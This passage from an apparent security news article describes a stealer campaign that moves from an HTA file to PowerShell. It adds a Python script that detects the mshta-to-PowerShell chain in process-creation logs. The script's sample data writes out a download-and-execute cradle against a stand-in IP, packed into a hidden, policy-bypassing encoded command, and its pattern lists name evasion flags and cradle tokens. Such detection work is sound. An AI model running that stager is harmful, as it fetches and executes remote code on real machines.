Once the HTA file (an HTML Application, a script that Windows runs outside the browser through mshta.exe) is opened, it launches PowerShell code that establishes a command-and-control (C2) channel, downloads decoy PDF files to avoid arousing the victim's suspicion, and performs malicious shellcode injection.
“These files aim to insert the end-stealer into legitimate processes, launch malicious actions and send the stolen data back to the C2 server,” added Fortinet.
The for-hire stealer targets web browsers, cryptocurrency wallets, messaging apps, email clients, VPN clients, password managers, AnyDesk, and MySQL Workbench, among many other applications.
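The weakest link in this chain, from the attacker's side, is the hand-off from mshta.exe to PowerShell: a legitimate HTA rarely spawns a hidden, execution-policy-bypassing PowerShell with an encoded command. The script below is an added example written for this article (it is not from Fortinet's report or from the campaign) that applies that detection to process-creation events. It assumes Sysmon Event ID 1-style field names (ParentImage, Image, CommandLine, ProcessId); the three sample events, the file paths, the PIDs and the 198.51.100.7 staging address are all constructed for the demonstration.

```python
"""Detect the mshta.exe -> PowerShell stager chain described above.
Added example; the sample events are constructed, not real campaign telemetry."""
import base64
import binascii
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
# Evasion switches commonly combined with a -EncodedCommand stager.
EVASION_FLAGS = re.compile(
    r"(?i)(?:-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden\b|-ep\s+bypass\b|-executionpolicy\s+bypass\b)")
# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob.
ENCODED_CMD = re.compile(r"(?i)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
CRADLE_TOKENS = ("net.webclient", "downloadstring", "downloadfile", "invoke-webrequest",
                 "iex", "invoke-expression", "frombase64string", "start-bitstransfer")


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16le", errors="replace")


def analyze_event(ev):
    """Apply the rules to one process-creation event; returns a list of (rule, detail)."""
    findings = []
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    cmd = ev.get("CommandLine", "")
    if parent == "mshta.exe" and child in SCRIPT_HOSTS:
        findings.append(("mshta_spawns_script_host", f"{parent} -> {child}"))
    if child in {"powershell.exe", "pwsh.exe"}:
        flags = sorted({f.lower() for f in EVASION_FLAGS.findall(cmd)})
        if flags:
            findings.append(("powershell_evasion_flags", ", ".join(flags)))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits = [t for t in CRADLE_TOKENS if t in decoded.lower()]
            if hits:
                findings.append(("encoded_download_cradle", f"{', '.join(hits)} | {decoded}"))
    return findings


def scan(events):
    """Run every event through the rules; one alert dict per (event, rule) pair."""
    alerts = []
    for ev in events:
        for rule, detail in analyze_event(ev):
            alerts.append({"ProcessId": ev["ProcessId"], "Image": basename(ev["Image"]),
                           "rule": rule, "detail": detail})
    return alerts


def encode_ps(command):
    """Build a -EncodedCommand payload the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed Sysmon Event ID 1-style records. Field names follow Sysmon's
# ParentImage/Image/CommandLine naming; paths, PIDs and the 198.51.100.7
# address are made up for the example.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
SAMPLE_EVENTS = [
    {"ProcessId": 4012, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\victim\Downloads\invoice.hta"'},
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {encode_ps(STAGER)}"},
    {"ProcessId": 4233, "ParentImage": r"C:\Windows\explorer.exe",   # benign scheduled script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"pid={a['ProcessId']} {a['Image']}: {a['rule']} ({a['detail']})")
```

Only the PowerShell process spawned by mshta.exe trips the rules; the benign scheduled script does not, because the three rules key on the parent process, the evasion switches and the decoded payload rather than on PowerShell itself. In a real deployment the parent-child rule alone is already high-signal, and decoding the encoded command gives analysts the staging URL to block at the C2 stage.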